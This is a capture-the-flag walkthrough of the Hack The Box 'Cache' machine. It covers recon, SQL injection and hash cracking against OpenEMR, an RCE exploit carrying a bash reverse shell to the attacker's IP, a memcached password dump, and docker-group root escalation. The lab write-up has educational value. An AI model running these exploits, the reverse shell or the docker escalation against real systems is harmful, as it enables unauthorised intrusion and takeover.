HTB Cache Write-Up

HTB Cache Write-Up

User Flag

Result of nmap scan:

Nmap Result
1
2
3
4
5
6
7
8
9
10
PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
| 256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_ 256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Heading to the IP address in the browser reveals a website looking static and old. The login page however references an unusually named script /jquery/functionality.js. Opening it reveals the only working credentials in the login form is ash:H@v3_fun. But the page behind it is under construction with a nice picture of Ace from One Piece.
Further exploration in the Author page shows:

ASH is a Security Researcher (Threat Research Labs), Security Engineer. Hacker, Penetration Tester and Security blogger. He is Editor-in-Chief, Author & Creator of Cache. Check out his other projects like Cache:

HMS (Hospital Management System)

So if we are exploring cache.htb and it says that there is HMS which is like cache so can it be a hms.htb ?!
Add that to the /etc/hosts file and we got a login page. It seems apparently it’s a CMS called OpenEMR. When facing a CMS, I don’t directly go for gobuster since their structure can be found directly where the CMS is available like Github and you can even find listed vulnerabilities.

Found OpenEMR on Github but the robots.txt does not mention the version. Their is a admin.php in the root folder and http://hms.htb/admin.php reveals the version used is 5.0.1 (3). Still from Github, switch to the appropriate tag from that version in order to see the source code which is deployed at HMS.

Now for vulnerability hunting, searchsploit reveals a RCE for our version but we need to get authenticated. A Google search ended with a PDF containing a ton of vulnerabilites. Follow the instructions necessary to make a SQL injection with the catid GET parameter of /portal/find_appt_popup_user.php. To speed the exfiltration of the users, you will find at the repo the database schema and the target table is called users_secure.
Successful SQLMap exploitation gives the credentials openemr_admin:$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. This being a Bcrypt hash, pass it to john or hashcat and it will come as being xxxxxx (what a dumb password for an admin, lol).

Now we are authenticated, time to use the exploit we found with searchsploit.

1
2
3
4
$ searchsploit -m php/webapps/45161.py
$ mv 45161.py openemr_rce.py
# Listen to a port with netcat in another shell
$ python openemr_rce.py http://hms.htb -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/<tun0_ip>/<port> 0>&1'

And you have a shell !

The user flag is owned and readable only by ash but we do have a password for ash found in the cache JS script. Let’s try that:

1
2
3
4
5
$ python3 -c 'import pty; pty.spawn("/bin/bash")' # Spawn TTY shell
$ su ash
$ password: H@v3_fun
$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash)

Voilà!

Root Flag

Ash can’t sudo in the box so we used the famous linpeas script to check for possible things we can exploit.
In the process list, I spotted

1
2
memcache  1098  0.0  0.1 425792  4052 ?        Ssl  13:30   0:00 /usr/bin/memcached -m 64 -p 11211 -u memcache -l 127.0.0.1 -P /var/run/memcached/memc
ached.pid

Memcache is running at 11211, so let’s try to see what informations it can give us.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
ash@cache:~$ telnet localhost 11211
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
stats items
.
.
.
stats cachedump 1 100
ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END
get passwd
VALUE passwd 0 9
0n3_p1ec3
END

And we got 0n3_p1ec3 ! That is sure to be the password of user luffy (I’m a BIG fan of One Piece by the way).

Now lateral movement is done and luffy can’t sudo too, let’s use again linpeas. The first ouputs reveal luffy is a member of the docker group.

1
User & Groups: uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)

This means we can run docker commands like deploy containers. The Privilege escalation became clear. We need to deploy an interactive container and mount the host filesystem as a volume in the container and like we will be root in the container, we will be root of the mounted volume which is the current box. Let’s first check if there is any image in the box we can use for that because if not, we will have to set a docker repository from our machine, host a useful image in it and make the box pull it.

1
2
3
4
5
luffy@cache:~$ docker image ls
REPOSITORY TAG IMAGE ID CREATED SIZE
ubuntu latest 2ca708c1c9cc 8 months ago 64.2MB
luffy@cache:~$ docker run --rm -it -v /:/mnt ubuntu chroot /mnt
#

Congratulations, you just rooted the box.